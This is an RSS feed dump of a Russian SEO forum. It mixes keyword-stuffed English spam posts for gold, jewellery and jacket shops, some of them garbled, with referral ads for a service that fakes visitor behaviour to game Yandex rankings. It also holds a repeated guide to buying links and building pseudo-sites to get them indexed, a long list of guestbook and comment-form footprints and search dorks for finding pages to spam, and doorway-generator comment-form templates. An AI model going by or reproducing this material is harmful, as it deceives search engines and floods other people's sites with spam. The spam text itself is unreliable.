http://realseo.mybb.forum/ realseo ru-ru Mon, 28 May 2012 21:54:47 +0400 MyBB/mybb.ru http://realseo.mybb.forum/viewtopic.php?pid=52#p52 <p>Как вывести сайт в Топ-50 Яндекса? Одним из эффективных способом достижения этой задачи является продвижение сайта с помощью системы Userator. Данная система представляет собой мощный инструмент раскрутки сайта на основе поведенческого фактора, т.е. полностью имитирует действия пользователя, которые поисковые системы расценивают как реальные заходы реальных посетителей на сайт и повышают рейтинг сайта в поисковой выдаче. Все, что необходимо сделать, это зарегистрироваться по ссылке&#160; <a href="http://userator.ru" rel="nofollow" target="_blank">http://userator.ru</a>?par=27420 , указать адрес сайта и размер желаемой суммы, которую Вы готовы потратить на продвижение. Всю остальную работу система возьмет на себя.</p> mybb@mybb.ru (Stalker75) Mon, 28 May 2012 21:54:47 +0400 http://realseo.mybb.forum/viewtopic.php?pid=52#p52 http://realseo.mybb.forum/viewtopic.php?pid=51#p51 <div class="quote-box quote-main"><blockquote><p>klikvip.com - с ней я работаю в данный момент! Они выдают 99% от клика + после того как вы заработаете 300$ вам в качестве бонуса будет накинуто ещё 50 =), и как-то приятней мне с ней работается, в отличии от умакса у меня именно на клике начался первый выхлоп (первая прибыль), ну так вот там же вам нужно найти человека, вашего наставника или учителя (как вам будет удобней), который даст вам пригласительный код именуемый &quot;инвайтом&quot; Этим человеком есесно могу быть и я =)</p></blockquote></div><p>klikvip.com - Affiliate Program is no longer supported. Партнерская программа больше не поддерживается. Предлагаю практически аналог но с гараздо большими возможностями (можно заробатовать как при помощи доров так и при помощи полноценного сайта), многочисленные настройки по фидам, шаблонам, имеются собств скрипты, фото блоки. Есть даже базы кейвордов которые не могут радовать (например адулт база Колличество кивордов 491339) Ссылка для регестрации <a href="http://b23.ru/3arc" rel="nofollow" target="_blank">регистрация в пп</a></p> mybb@mybb.ru (gsminfo) Fri, 04 Nov 2011 02:05:45 +0400 http://realseo.mybb.forum/viewtopic.php?pid=51#p51 http://realseo.mybb.forum/viewtopic.php?pid=50#p50 <p>1. I believe that if anything <a href="http://www.mmohotsale.com/" rel="nofollow" target="_blank">wow gold</a>&#160; is worth doing, it would <a href="http://www.thehotfocus.com/" rel="nofollow" target="_blank">cheap runescape gold</a>&#160; have been done already. 2. <a href="http://runescape.mmohotsale.com/" rel="nofollow" target="_blank">buy runescape gold</a>&#160; I shall never move quickly, <a href="http://www.rsgoldmore.com/" rel="nofollow" target="_blank">runescape gold for sale</a>&#160; except to avoid more work <a href="http://rift.mmorpggolds.com/" rel="nofollow" target="_blank">rift gold</a>&#160; or find excuses. 3. I <a href="http://www.newriftstore.com/buy-rift-items/" rel="nofollow" target="_blank">buy rift items</a>&#160; will never rush into a <a href="http://www.buywowgolds.us/" rel="nofollow" target="_blank">buy wow gold</a>&#160; job without a lifetime of <a href="http://www.safegoldsonline.com/" rel="nofollow" target="_blank">wow po</a>&#160; consideration. 4. I shall meet <a href="http://www.mmorpgsaler.com/runescape-gold/" rel="nofollow" target="_blank">runescape gold</a>&#160; all of my deHi, can I speak to Mark?... Oh, there isn't?... I'm sorry, I must have dialed the wrong number.</p> mybb@mybb.ru (buyrslife) Tue, 06 Sep 2011 11:40:07 +0400 http://realseo.mybb.forum/viewtopic.php?pid=50#p50 http://realseo.mybb.forum/viewtopic.php?pid=49#p49 <p>Apart from these necklaces you will find so <a href="http://www.cheapandoraoutlet.com/" rel="nofollow" target="_blank">pandora beads</a> a large range of other items that catch the attention of the eye balls of people<br />1 this kind of team of item could be the charms <a href="http://www.hotpandoras.com/" rel="nofollow" target="_blank">pandora</a> The types out there tend to be a little bit surprising for any initial time visitor<br />but for any human being who has learned some thing about Thomas Sabo won't be that amazed <a href="http://www.pandorasjewelryonline.com/" rel="nofollow" target="_blank">pandora bracelets</a> as he will most likely be expecting this<br />The elegance bracelet is surely an product which could <a href="http://www.onlinepandorasale.com/" rel="nofollow" target="_blank">pandora uk</a> be the popular of equally guys and ladies alike</p> mybb@mybb.ru (dddeee66) Fri, 26 Aug 2011 10:24:11 +0400 http://realseo.mybb.forum/viewtopic.php?pid=49#p49 http://realseo.mybb.forum/viewtopic.php?pid=48#p48 <p>Apart from these necklaces you will find so <a href="http://www.monclersortie.com/moncler-vente.html" rel="nofollow" target="_blank">moncler enfant</a> a large range of other items that catch the attention of the eye balls of people<br />1 this kind of team of item could be the charms <a href="http://www.monclertomada.com/" rel="nofollow" target="_blank">moncler outlet</a> The types out there tend to be a little bit surprising for any initial time visitor<br />but for any human being who has learned some thing about Thomas Sabo won't be that amazed <a href="http://www.monclersaleonline.uk.com/" rel="nofollow" target="_blank">moncler jackets</a> as he will most likely be expecting this<br />The elegance bracelet is surely an product which could <a href="http://www.monclersjacketsoutlet.com/" rel="nofollow" target="_blank">moncler coat</a> be the popular of equally guys and ladies alike</p> mybb@mybb.ru (dddeee66) Fri, 26 Aug 2011 10:15:13 +0400 http://realseo.mybb.forum/viewtopic.php?pid=48#p48 http://realseo.mybb.forum/viewtopic.php?pid=47#p47 <p>Apart from these necklaces you will find so <a href="http://www.dressesonlinesale.co.uk/" rel="nofollow" target="_blank">party dresses</a> a large range of other items that catch the attention of the eye balls of people<br />1 this kind of team of item could be the charms <a href="http://www.billigtiffanyverkauf.com/" rel="nofollow" target="_blank">tiffany schmuck</a> The types out there tend to be a little bit surprising for any initial time visitor<br />but for any human being who has learned some thing about Thomas Sabo won't be that amazed <a href="http://www.cheaptiffanyonlinesale.com/" rel="nofollow" target="_blank">tiffany australia</a> as he will most likely be expecting this<br />The elegance bracelet is surely an product which could <a href="http://www.uggslaarsonline.com/" rel="nofollow" target="_blank">ugg online</a> be the popular of equally guys and ladies alike</p> mybb@mybb.ru (dddeee66) Fri, 26 Aug 2011 10:13:28 +0400 http://realseo.mybb.forum/viewtopic.php?pid=47#p47 http://realseo.mybb.forum/viewtopic.php?pid=46#p46 <p>Apart from these necklaces you will find so <a href="http://www.monclersalida.com/" rel="nofollow" target="_blank">moncler</a> a large range of other items that catch the attention of the eye balls of people<br />1 this kind of team of item could be the charms <a href="http://www.monclerpresa.com/" rel="nofollow" target="_blank">giubbini moncler</a> The types out there tend to be a little bit surprising for any initial time visitor<br />but for any human being who has learned some thing about Thomas Sabo won't be that amazed <a href="http://www.moncleralennus.com/" rel="nofollow" target="_blank">moncler jackor</a> as he will most likely be expecting this<br />The elegance bracelet is surely an product which could <a href="http://www.monclerrabat.com/" rel="nofollow" target="_blank">moncler danmark</a> be the popular of equally guys and ladies alike</p> mybb@mybb.ru (dddeee66) Fri, 26 Aug 2011 10:11:38 +0400 http://realseo.mybb.forum/viewtopic.php?pid=46#p46 http://realseo.mybb.forum/viewtopic.php?pid=45#p45 <p>The several shapes and versions with the items are <a href="http://www.dressesonlinesale.co.uk/" rel="nofollow" target="_blank">party dresses</a> 1 with the key functions that make them attractive<br />These style ornaments are provided in so a large range of several shapes as <a href="http://www.billigtiffanyverkauf.com/" rel="nofollow" target="_blank">tiffany schmuck</a> dimensions to ensure that you'll be capable to select the proper 1 which fits the facial functions with the recipient<br />The oval deal with could be the most frequent condition <a href="http://www.cheaptiffanyonlinesale.com/" rel="nofollow" target="_blank">tiffany co</a> with the deal with and most with the jewel shapes will mix with it perfectly<br />Thomas Sabo necklace is 1 with the warm merchandise within the list <a href="http://www.uggslaarsonline.com/" rel="nofollow" target="_blank">ugg</a> you will find several enthusiasts because of this specific variety of products</p> mybb@mybb.ru (dddeee66) Fri, 26 Aug 2011 10:10:38 +0400 http://realseo.mybb.forum/viewtopic.php?pid=45#p45 http://realseo.mybb.forum/viewtopic.php?pid=44#p44 <p>root</p> mybb@mybb.ru (reaktor) Tue, 01 Feb 2011 11:37:58 +0300 http://realseo.mybb.forum/viewtopic.php?pid=44#p44 http://realseo.mybb.forum/viewtopic.php?pid=43#p43 <p>root</p> mybb@mybb.ru (reaktor) Tue, 01 Feb 2011 11:37:39 +0300 http://realseo.mybb.forum/viewtopic.php?pid=43#p43 http://realseo.mybb.forum/viewtopic.php?pid=42#p42 <p>Как и просили, небольшая заметка по работе в системе Sape.<br />Не буду писать описание интерфейсов, плюсы и минусы системы, можете почитать следующих авторов:<br /><a href="http://www.tagirov.org/blog/27/" rel="nofollow" target="_blank">http://www.tagirov.org/blog/27/</a><br /><a href="http://seoplace.spb.ru/?p=199" rel="nofollow" target="_blank">http://seoplace.spb.ru/?p=199</a><br /><a href="http://web-blog.ru/2007/03/07/webmaster-tricks/" rel="nofollow" target="_blank">http://web-blog.ru/2007/03/07/webmaster-tricks/</a><br /><a href="http://www.blog.votinfo.com/2007/03/2-dnya-v-sape-polet-normalnyiy/" rel="nofollow" target="_blank">http://www.blog.votinfo.com/2007/03/2-d &#8230; ormalnyiy/</a></p> <p>Итак, продвигаем вместе с Sape.</p> <p>1) Регистрация. Регистрируемся (если еще нет аккаунта) в системе Sape (ссылка реферальная, моих рефералов консультирую по работе в системе бесплатно. Обычная ссылка – здесь).</p> <p>2) Создаем проект. Создаем новый проект, добавляем урлы продвигаемых страниц.<br />Небольшой оффтопик: современная реальность диктует золотой закон оптимизатора – одна страница – один запрос.<br />В частности, это связано с неоднозначным поведением нескольких запросов на одной странице – кореллирующие запросы поднимают общую часть, некореллирующие – выталкивают друг друга (речь идет о высококонкурентных запросах).<br />Поясню на примере – вы можете продвигать одну страницу по запросам<br />- офисная мебель<br />- недорогая офисная мебель<br />- офисная мебель Москва<br />- продажа офисной мебели<br />- интернет магазин офисной мебели<br />Но не сможете вывести одну страницу по запросам<br />- офисная мебель<br />- мягкая мебель<br />Уточню, что данный принцип актуален для всех поисковых систем.</p> <p>3) Составляем анкоры. Итак, у нас есть готовый проект с разбитым по страницам семантическим ядром – пора составлять тексты ссылок.<br />Несколько тонкостей:<br />- для конкурентных запросов не советую составлять тексты состоящие только из прямого вхождения запроса<br />- можно выделить 3 вида текстов:<br />— запросы разбавленные незначащими словами (к примеру, «офисная мебель» -&gt; «качественная российская офисная мебель»)<br />— запросы, имитирующие газетные заголовки (к примеру, «Компания Test-Мебель предлагает офисную мебель и недорогие офисные кресла.»)<br />— запросы-перечисления (к примеру «офисная мебель, офисные кресла, офисные стулья»)<br />Примерное соотношение количества таких текстов 2:2:1<br />- не забываем оформлять анкоры ссылок текстом (желательно с вхождением запросов) (к примеру «Офисная мебель Test-Mebel – #a#качественная офисная мебель#/a# от производителя.»)<br />Для генерации лучше всего использовать собственный софт, при его отсутствии – можете использоватье генератор AllSubmitter-a, генератор SePack или любой другой. </p> <p>4) Покупка ссылок. Тексты составлены, приступаем к покупке ссылок.<br />Основной способ покупки, используемый мной и большинством опытных оптимизаторов – «лесенка» автофильтров. Т.е. создание каскада автофильтров исходя из качественной и ценовой категории площадок.<br />Самая простая лесенка выглядит так:</p> <p>Filter1: PR, CY, уровень вложенности не имеют значения, цена до 0.04<br />Filter2: PR от 0 до 9 | CY от 120 до 20000 уровень вложенности не имеет значения, цена до 0.06<br />Filter3: PR от 0 до 9 | CY от 300 до 20000 уровень вложенности не имеет значения, цена до 0.16<br />Filter4: PR от 0 до 9 | CY от 500 до 20000 | уровень вложенности=2, цена до 0.26<br />Filter5: PR от 1 до 9 | CY от 500 до 20000 | уровень вложенности=2, цена до 0.69<br />Filter6: PR от 1 до 9 | CY от 900 до 20000 | уровень вложенности=2, цена до 0.99</p> <p>Filter1t: тематическая | PR, CY, уровень вложенности не имеют значения, цена до 0.04<br />Filter2t: тематическая | PR от 0 до 9 | CY от 120 до 20000 | уровень вложенности не имеет значения, цена до 0.06<br />Filter3t: тематическая | PR от 0 до 9 | CY от 300 до 20000| уровень вложенности не имеет значения, цена до 0.16<br />Filter4t: тематическая | PR от 0 до 9 | CY от 500 до 20000 | уровень вложенности=2, цена до 0.26<br />Filter5t: тематическая | PR от 1 до 9 | CY от 500 до 20000 | уровень вложенности=2, цена до 0.69<br />Filter6t: тематическая | PR от 1 до 9 | CY от 900 до 20000 | уровень вложенности=2, цена до 0.99</p> <p>Данный пример не является лучшим, это просто образец для составления собственной системы фильтров.<br />Несколько слов о фильтрах Filter*t – буквально на днях система Sape ввела возможность покупки ссылок только со страниц содержащих выбранные слова. Эффективность данного метода на порядок выше обычной покупки (о причинах расскажу в одной из следующих статей), но количество свободных «тематических» страниц относительно невелико.<br />На всех фильтрах не советую покупать страницы с числом внешних более 10, на слабых страницах – с числом внешних более 7.</p> <p>Распределение бюджета по фильтрам вещь тоже сугубо индивидуальная (кто-то предпочитает много слабых страниц, тем самым имитируя линкатор, кто-то немного, но помощнее, имитирую биржу). Я советую распределять бюджет равномерно, в первую очередь покупая «тематические» страницы, затем все остальное.</p> <p>5) Индексация ссылок. Не открою Америку, если сообщу что внутренние страницы индексируются много медленнее чем главные, а самые слабые, нулевые странички вообще могут не индексироваться месяцами. Наша цель – исправить ситуацию, ускорив индексацию купленных ссылок.<br />Способов решения много, самые популярные:<br />- экспорт всех урлов ссылок в один файл (т.н. «простыня ссылок»), публикация ее на фрихосте и проставление нескольких ссылок на данный документ. Плюсы – простота метода. Минусы – а вот минусы советую проверить самим, лишь намекну что связаны они с индексацией Яндексом страниц, содержащих большое число ссылок.<br />- бомбардировка AddUrl-илки адресами. Не использую данный метод и другим не советую.<br />- метод, используемый нами: генерация псевдо-сайта, с размещением 5-10 ссылок на страницу в тексте. Описывать подробно инструментарий нет смысла (скажу, что делается все автоматом – от экспорта из Sape до заливки на FTP), дорвейщики меня поймут. Пример подобного «сайта»: <a href="http://matlib3.narod.ru/" rel="nofollow" target="_blank">http://matlib3.narod.ru/</a> (как правило, яндексом индексируется на ура)</p> <p>6) Поддержка проекта. Созданный проект постоянно нуждается в мониторинге – удалению занепоченных страниц, страниц с большим числом внешних ссылок (кстати, причина не в самом количестве, а в потенциальной возможности наложения санкций на такие страницы) – BL и GBL вам в помощь, докупке дополнительных ссылок, добавлению текстов et cetera.</p> <p>И напоследок несколько нюансов:<br />1) добавьте в проект урл продвигаемого документа (только вместо <a href="http://www.sait.ru/" rel="nofollow" target="_blank">http://www.sait.ru/</a> добавьте <a href="http://www.sait.ru" rel="nofollow" target="_blank">http://www.sait.ru</a>), тексты к нему составьте следующим образом</p> <p>wwwsait.ru<br /><a href="http://www.sait.ru/" rel="nofollow" target="_blank">http://www.sait.ru/</a><br /><a href="http://sait.ru" rel="nofollow" target="_blank">http://sait.ru</a><br />sait.ru </p> <p>И купите сотню ссылок по фильтру Filter1.<br />Зачем это делать? В двух словах – делаем анкор-лист более «естесственным». Более подробно отпишу после получения результата экспериментов.<br />2) Самые дорогие ссылки (от $1 и выше) лучше покупать вручную, сразу проверяя на санкции.<br />3) Довольно часто встречаются недобросовестные вебмастера, неадекватно увеличивающие цену на площадках, устанавливающие код ссылок вне , закрывающие страницы от индексации, устанавливающие огромное количество внешних ссылок. Использование GBL сэкономит вам бюджет и нервы&#160; </p> <p>4) не используйте знаки разделители (».» , «!» и «?») в текстах ссылок – Яндекс учтет текст ссылки до разделителя.</p> <p>P.S. Надеюсь, мой небольшой мануал принесет кому-то пользу.</p> mybb@mybb.ru (reaktor) Mon, 31 Jan 2011 22:53:29 +0300 http://realseo.mybb.forum/viewtopic.php?pid=42#p42 http://realseo.mybb.forum/viewtopic.php?pid=41#p41 <p><a href="http://realseo.mybb.forum/pages/map">http://realseo.mybb.forum/pages/map</a></p> mybb@mybb.ru (reaktor) Mon, 31 Jan 2011 16:26:50 +0300 http://realseo.mybb.forum/viewtopic.php?pid=41#p41 http://realseo.mybb.forum/viewtopic.php?pid=40#p40 <p>кому надо кеи пишите в личку</p> mybb@mybb.ru (reaktor) Fri, 28 Jan 2011 00:16:33 +0300 http://realseo.mybb.forum/viewtopic.php?pid=40#p40 http://realseo.mybb.forum/viewtopic.php?pid=39#p39 <p>berry.cgi <br />guestbook/sign.php <br />gbook.php?a=sign <br />guestbook/sign.asp <br />yapgb.php?action=sign <br />guestbook.php?act=new <br />aska.cgi <br />dcguest.cgi <br />wbbook/index.php <br />addentry.php <br />guestbook.php?action=add <br />slime.cgi <br />ibbsf2.cgi <br />upb.cgi <br />coolzup.cgi <br />nextbbs.cgi <br />board.cgi <br />pldbbs.cgi <br />gk.htm <br />node <br />gjestebok.htm <br />index.php?inputmask=0 <br />blog_comment.asp?blog_id= <br />guestbook_sign.php <br />gform.asp <br />guestbook.php?offset= <br />noutenki <br />guestbook/message.php?page=new <br />dcguest.cgi?action=add_form <br />gaestebuch.php?user= <br />guestbook.asp?action=sign <br />add_comment.asp?ID <br />AddGuestBookEntry.asp <br />guestbook.cgi?action=add <br />guestbook/add.asp <br />gb/sign.asp <br />add.php?sid=0 <br />gaestebuch.php?action=entry <br />gbook.php?a=sign <br />index.php?guestbook_page=1 <br />guestbook.php?act=new <br />gbs/sign.php <br />index.php?inputmask=0 <br />guestbook.php?row_start= <br />Question.asp?GID= <br />guestbook.cgi?start= <br />apeboard_plus.cgi <br />gbook.pl <br />gbook.asp <br />gbook.html <br />gb.php <br />guestbook.php <br />guestbook.asp <br />guestbook.html <br />blog <br />DancerDish_post.htm <br />post_message.asp?fid= <br />sign.asp?PagePosition= <br />board.cgi?action=showmsg&amp;num= <br />bbs_post.asp <br />gb.asp?action=sign <br />post.jsp?forum= <br />guestbook.php?rowstart <br />gbook/add-sign.php? <br />POST ARTICLE <br />submit.html <br />&amp;part=1 <br />index.php?p= <br />post.htm <br />Guestbook.php?displayBegin <br />mde.asp?id= <br />html&amp;mode=reply <br />guestbook.php?action=Sign <br />guestbook <br />post a comments <br />comments <br />sign guestbook <br />sign the guestbook <br />view the guestbook <br />view guestbook <br />sing up <br />submit comment <br />submit <br />guest <br />submit comment <br />add guestbook <br />leave a reply <br />leave a comment <br />comment plugger <br />add message <br />send message <br />send comment <br />send <br />comment <br />preview <br />preview comments <br />preview comment <br />submit your comments <br />view entry <br />submit entry <br />back to guestbook <br />action wiki <br />wiki <br />Add site <br />Add a site <br />Add URL <br />Add a URL <br />Ads <br />Advertiser Testimonials <br />Article <br />Articles <br />Blog <br />Blogs <br />Buy Links <br />Directory <br />Directories <br />Donate <br />Donation <br />Donations <br />Ezine <br />Ezine Ads <br />Links <br />Merchants <br />Newsletter <br />Newsletter Ads <br />Rent Links <br />Resources <br />Related sites <br />Related urls <br />Sites <br />Sponsors <br />Sponsorship <br />Submit a link <br />Submit a site <br />Submit URL <br />Submit an URL <br />Suggest a link <br />Suggest a site <br />Suggest URL <br />Suggest an URL <br />Thanks to Our Sponsors <br />Tips <br />Vendors <br />Weblog <br />allinurl:&quot;ugb.cgi?action=addentry&quot; <br />allinurl:&quot;g.php?user&quot;....</p> mybb@mybb.ru (reaktor) Fri, 28 Jan 2011 00:15:12 +0300 http://realseo.mybb.forum/viewtopic.php?pid=39#p39 http://realseo.mybb.forum/viewtopic.php?pid=38#p38 <p>Как и просили, небольшая заметка по работе в системе Sape.<br />Не буду писать описание интерфейсов, плюсы и минусы системы, можете почитать следующих авторов:<br /><a href="http://www.tagirov.org/blog/27/" rel="nofollow" target="_blank">http://www.tagirov.org/blog/27/</a><br /><a href="http://seoplace.spb.ru/?p=199" rel="nofollow" target="_blank">http://seoplace.spb.ru/?p=199</a><br /><a href="http://web-blog.ru/2007/03/07/webmaster-tricks/" rel="nofollow" target="_blank">http://web-blog.ru/2007/03/07/webmaster-tricks/</a><br /><a href="http://www.blog.votinfo.com/2007/03/2-dnya-v-sape-polet-normalnyiy/" rel="nofollow" target="_blank">http://www.blog.votinfo.com/2007/03/2-d &#8230; ormalnyiy/</a></p> <p>Итак, продвигаем вместе с Sape.</p> <p>1) Регистрация. Регистрируемся (если еще нет аккаунта) в системе Sape (ссылка реферальная, моих рефералов консультирую по работе в системе бесплатно. Обычная ссылка – здесь).</p> <p>2) Создаем проект. Создаем новый проект, добавляем урлы продвигаемых страниц.<br />Небольшой оффтопик: современная реальность диктует золотой закон оптимизатора – одна страница – один запрос.<br />В частности, это связано с неоднозначным поведением нескольких запросов на одной странице – кореллирующие запросы поднимают общую часть, некореллирующие – выталкивают друг друга (речь идет о высококонкурентных запросах).<br />Поясню на примере – вы можете продвигать одну страницу по запросам<br />- офисная мебель<br />- недорогая офисная мебель<br />- офисная мебель Москва<br />- продажа офисной мебели<br />- интернет магазин офисной мебели<br />Но не сможете вывести одну страницу по запросам<br />- офисная мебель<br />- мягкая мебель<br />Уточню, что данный принцип актуален для всех поисковых систем.</p> <p>3) Составляем анкоры. Итак, у нас есть готовый проект с разбитым по страницам семантическим ядром – пора составлять тексты ссылок.<br />Несколько тонкостей:<br />- для конкурентных запросов не советую составлять тексты состоящие только из прямого вхождения запроса<br />- можно выделить 3 вида текстов:<br />— запросы разбавленные незначащими словами (к примеру, «офисная мебель» -&gt; «качественная российская офисная мебель»)<br />— запросы, имитирующие газетные заголовки (к примеру, «Компания Test-Мебель предлагает офисную мебель и недорогие офисные кресла.»)<br />— запросы-перечисления (к примеру «офисная мебель, офисные кресла, офисные стулья»)<br />Примерное соотношение количества таких текстов 2:2:1<br />- не забываем оформлять анкоры ссылок текстом (желательно с вхождением запросов) (к примеру «Офисная мебель Test-Mebel – #a#качественная офисная мебель#/a# от производителя.»)<br />Для генерации лучше всего использовать собственный софт, при его отсутствии – можете использоватье генератор AllSubmitter-a, генератор SePack или любой другой. </p> <p>4) Покупка ссылок. Тексты составлены, приступаем к покупке ссылок.<br />Основной способ покупки, используемый мной и большинством опытных оптимизаторов – «лесенка» автофильтров. Т.е. создание каскада автофильтров исходя из качественной и ценовой категории площадок.<br />Самая простая лесенка выглядит так:</p> <p>Filter1: PR, CY, уровень вложенности не имеют значения, цена до 0.04<br />Filter2: PR от 0 до 9 | CY от 120 до 20000 уровень вложенности не имеет значения, цена до 0.06<br />Filter3: PR от 0 до 9 | CY от 300 до 20000 уровень вложенности не имеет значения, цена до 0.16<br />Filter4: PR от 0 до 9 | CY от 500 до 20000 | уровень вложенности=2, цена до 0.26<br />Filter5: PR от 1 до 9 | CY от 500 до 20000 | уровень вложенности=2, цена до 0.69<br />Filter6: PR от 1 до 9 | CY от 900 до 20000 | уровень вложенности=2, цена до 0.99</p> <p>Filter1t: тематическая | PR, CY, уровень вложенности не имеют значения, цена до 0.04<br />Filter2t: тематическая | PR от 0 до 9 | CY от 120 до 20000 | уровень вложенности не имеет значения, цена до 0.06<br />Filter3t: тематическая | PR от 0 до 9 | CY от 300 до 20000| уровень вложенности не имеет значения, цена до 0.16<br />Filter4t: тематическая | PR от 0 до 9 | CY от 500 до 20000 | уровень вложенности=2, цена до 0.26<br />Filter5t: тематическая | PR от 1 до 9 | CY от 500 до 20000 | уровень вложенности=2, цена до 0.69<br />Filter6t: тематическая | PR от 1 до 9 | CY от 900 до 20000 | уровень вложенности=2, цена до 0.99</p> <p>Данный пример не является лучшим, это просто образец для составления собственной системы фильтров.<br />Несколько слов о фильтрах Filter*t – буквально на днях система Sape ввела возможность покупки ссылок только со страниц содержащих выбранные слова. Эффективность данного метода на порядок выше обычной покупки (о причинах расскажу в одной из следующих статей), но количество свободных «тематических» страниц относительно невелико.<br />На всех фильтрах не советую покупать страницы с числом внешних более 10, на слабых страницах – с числом внешних более 7.</p> <p>Распределение бюджета по фильтрам вещь тоже сугубо индивидуальная (кто-то предпочитает много слабых страниц, тем самым имитируя линкатор, кто-то немного, но помощнее, имитирую биржу). Я советую распределять бюджет равномерно, в первую очередь покупая «тематические» страницы, затем все остальное.</p> <p>5) Индексация ссылок. Не открою Америку, если сообщу что внутренние страницы индексируются много медленнее чем главные, а самые слабые, нулевые странички вообще могут не индексироваться месяцами. Наша цель – исправить ситуацию, ускорив индексацию купленных ссылок.<br />Способов решения много, самые популярные:<br />- экспорт всех урлов ссылок в один файл (т.н. «простыня ссылок»), публикация ее на фрихосте и проставление нескольких ссылок на данный документ. Плюсы – простота метода. Минусы – а вот минусы советую проверить самим, лишь намекну что связаны они с индексацией Яндексом страниц, содержащих большое число ссылок.<br />- бомбардировка AddUrl-илки адресами. Не использую данный метод и другим не советую.<br />- метод, используемый нами: генерация псевдо-сайта, с размещением 5-10 ссылок на страницу в тексте. Описывать подробно инструментарий нет смысла (скажу, что делается все автоматом – от экспорта из Sape до заливки на FTP), дорвейщики меня поймут. Пример подобного «сайта»: <a href="http://matlib3.narod.ru/" rel="nofollow" target="_blank">http://matlib3.narod.ru/</a> (как правило, яндексом индексируется на ура)</p> <p>6) Поддержка проекта. Созданный проект постоянно нуждается в мониторинге – удалению занепоченных страниц, страниц с большим числом внешних ссылок (кстати, причина не в самом количестве, а в потенциальной возможности наложения санкций на такие страницы) – BL и GBL вам в помощь, докупке дополнительных ссылок, добавлению текстов et cetera.</p> <p>И напоследок несколько нюансов:<br />1) добавьте в проект урл продвигаемого документа (только вместо <a href="http://www.sait.ru/" rel="nofollow" target="_blank">http://www.sait.ru/</a> добавьте <a href="http://www.sait.ru" rel="nofollow" target="_blank">http://www.sait.ru</a>), тексты к нему составьте следующим образом</p> <p>wwwsait.ru<br /><a href="http://www.sait.ru/" rel="nofollow" target="_blank">http://www.sait.ru/</a><br /><a href="http://sait.ru" rel="nofollow" target="_blank">http://sait.ru</a><br />sait.ru </p> <p>И купите сотню ссылок по фильтру Filter1.<br />Зачем это делать? В двух словах – делаем анкор-лист более «естесственным». Более подробно отпишу после получения результата экспериментов.<br />2) Самые дорогие ссылки (от $1 и выше) лучше покупать вручную, сразу проверяя на санкции.<br />3) Довольно часто встречаются недобросовестные вебмастера, неадекватно увеличивающие цену на площадках, устанавливающие код ссылок вне , закрывающие страницы от индексации, устанавливающие огромное количество внешних ссылок. Использование GBL сэкономит вам бюджет и нервы&#160; </p> <p>4) не используйте знаки разделители (».» , «!» и «?») в текстах ссылок – Яндекс учтет текст ссылки до разделителя.</p> <p>P.S. Надеюсь, мой небольшой мануал принесет кому-то пользу.</p> mybb@mybb.ru (reaktor) Thu, 27 Jan 2011 21:51:29 +0300 http://realseo.mybb.forum/viewtopic.php?pid=38#p38 http://realseo.mybb.forum/viewtopic.php?pid=37#p37 <p>&lt;form role=&quot;search&quot; method=&quot;get&quot; id=&quot;searchform&quot; action=&quot;&quot; &gt;<br />&#160; &#160; &lt;div&gt;&lt;label for=&quot;s&quot;&gt;Поиск:&lt;/label&gt;&#160; &#160; &#160; &#160;<br />&#160; &#160; &#160; &#160; &lt;input type=&quot;text&quot; value=&quot;&quot; name=&quot;s&quot; id=&quot;s&quot; /&gt;<br />&#160; &#160; &lt;input type=&quot;submit&quot; id=&quot;searchsubmit&quot; value=&quot;Найти&quot; /&gt;<br />&#160; &#160; &lt;/div&gt;<br />&#160; &#160; &#160; &#160; &lt;/form&gt;</p> <p>Форма Авторизации<br />&lt;form action=&quot;[SITE]/wp-login.php&quot; method=&quot;post&quot; id=&quot;login&quot;&gt;</p> <p> &lt;input name=&quot;user&quot; size=&quot;20&quot; tabindex=&quot;1&quot; </p> <p>type=&quot;text&quot; value=&quot;&quot;&gt;<br /> &lt;label for=&quot;user&quot;&gt;Имя&lt;/label&gt;&lt;br /&gt;</p> <p> &lt;input name=&quot;password&quot; size=&quot;20&quot; tabindex=&quot;2&quot; type=&quot;password&quot;&gt;<br /> &lt;label for=&quot;password&quot;&gt;Пароль&lt;/label&gt;&lt;br /&gt;</p> <p> &lt;input name=&quot;submit&quot; id=&quot;submit&quot; value=&quot;Войти&quot; type=&quot;submit&quot;&gt;</p> <p> &lt;br /&gt;<br /> &lt;/form&gt;</p> <p>Форма комментирования<br />&lt;form action=&quot;[SITE]/wp-comments-post.php&quot; method=&quot;post&quot; </p> <p>id=&quot;commentform&quot;&gt;</p> <p> &lt;input name=&quot;author&quot; id=&quot;author&quot; size=&quot;28&quot; tabindex=&quot;1&quot; </p> <p>type=&quot;text&quot; value=&quot;[BKEYWORD]&quot;&gt;<br /> &lt;label for=&quot;author&quot;&gt;Имя&lt;/label&gt; (ВСЕМ&amp;nbsp;обязательно)&lt;br /&gt;</p> <p> &lt;input name=&quot;email&quot; id=&quot;email&quot; size=&quot;28&quot; tabindex=&quot;2&quot; type=&quot;text&quot;&gt;<br /> &lt;label for=&quot;email&quot;&gt;E-mail&lt;/label&gt; (Всегда обязательно)&lt;br /&gt;<br /> &lt;input name=&quot;url&quot; id=&quot;url&quot; size=&quot;28&quot; tabindex=&quot;3&quot; type=&quot;text&quot;&gt;<br /> &lt;label for=&quot;url&quot;&gt;Сайт&lt;/label&gt;&lt;br /&gt;<br /> &lt;label for=&quot;comment&quot;&gt;Ваш комментарий:&lt;/label&gt;<br /> &lt;br /&gt;&lt;br /&gt;</p> <p> &lt;textarea name=&quot;comment&quot; id=&quot;comment&quot; cols=&quot;60&quot; rows=&quot;10&quot; </p> <p>tabindex=&quot;4&quot;&gt;&lt;/textarea&gt;<br /> &lt;br /&gt;</p> <p> &lt;input name=&quot;submit&quot; id=&quot;submit&quot; tabindex=&quot;5&quot; </p> <p>value=&quot;Комментировать [BKEYWORD]!&quot; type=&quot;submit&quot;&gt;<br /> &lt;input name=&quot;comment_post_ID&quot; value=&quot;875&quot; type=&quot;hidden&quot;&gt;<br /> &lt;br /&gt;<br /> &lt;/form&gt;</p> mybb@mybb.ru (reaktor) Thu, 27 Jan 2011 21:39:33 +0300 http://realseo.mybb.forum/viewtopic.php?pid=37#p37 http://realseo.mybb.forum/viewtopic.php?pid=36#p36 <p>Макросы для категорий<br />[MENU-X-Y] — урлы меню создаются из списка категорий, где Х – первый порядковый номер категории в списке, а Y – последний, естественно не меняется на всех страницах (то есть при 0-4 получаем 5 первых урла категорий)<br />[CAT] – категория для текущей страницы<br />[CATURL] – урл категории с анкором для текущей страницы<br />[CATURLCLEAR] – урл категории без анкора для текущей страницы<br />[CAT-N] – строчка из списка категорий, N – номер строчки категорий<br />[CATURL-N] – урл катгории с анкором, N – номер строчки категорий<br 